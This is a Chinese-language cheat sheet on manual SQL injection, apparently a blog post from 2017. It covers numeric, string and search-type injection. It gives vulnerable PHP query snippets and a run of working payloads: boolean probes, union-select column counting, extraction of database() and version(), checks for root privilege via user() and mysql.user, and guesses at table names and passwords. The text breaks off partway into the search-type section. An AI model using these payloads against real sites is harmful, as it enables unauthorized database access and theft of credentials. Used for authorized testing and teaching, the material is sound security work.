SQL注入手工检测
SQL注入手工检测
1基本检测
数字型字符型搜索型POST注入布尔盲注报错注入堆叠注入判断是什么数据库 2绕过技巧
大小写替换关键字使用编码注释和符号等价函数与命令特殊符号
2017年12月14日 09:36:16
1、基本检测
数字型
$id=@$_GET
['id'];
$sql =
"SELECT * FROM sqltest WHERE id='$
id'";
判断
asp?id=49'
asp?id=
49 and 1=
1
asp?id=
49 and 1=
2
判断什么型
?id=
1%
2b1
数据库权限判断,判断root
and ord(mid(user(),
1,
1))=
114 或
and (
select count(*) from
mysql.user)>
0
判断字段,字段一样返回正常,几个字段写几个null返回正常
php?id=
1 and 1=
1 union
select 1,
2,
3,
4,
5 或
php?id=
1 union
select null,null,
null.....
php?id=
1 and 1=
1 order by
3
强制返回记录
php?id=
2 union
select 1,
2,
3 limit
1,
1
字符型
$sql="select * from user where username = '$name'";
select * from user
where username
= 'admin'
$query="select first_name from users where id='$_GET['id']'";
1' union select database() #; //输入
select first_name from users where id='1'union select database()#'
判断
xx
' and '1'=1--'
xx
' and '1=2--'
猜字段
php?username=admin' union
select 1,
2,
3,
4 and '1'='1
猜对后是4个字段,替换相关回显位
php?username=admin' union
select database(),version(),
3,
4 and '1'='1
猜表名
php?username=admin'+and+(
select+count(
*)
+from
+user)
>0+and+''='
猜密码
php?username=admin' and password
='fendo
搜索型
$sql="select * from user where password like '%$pwd%' order by password";
'and 1=1 and '%'='
select * from user
where password like
'
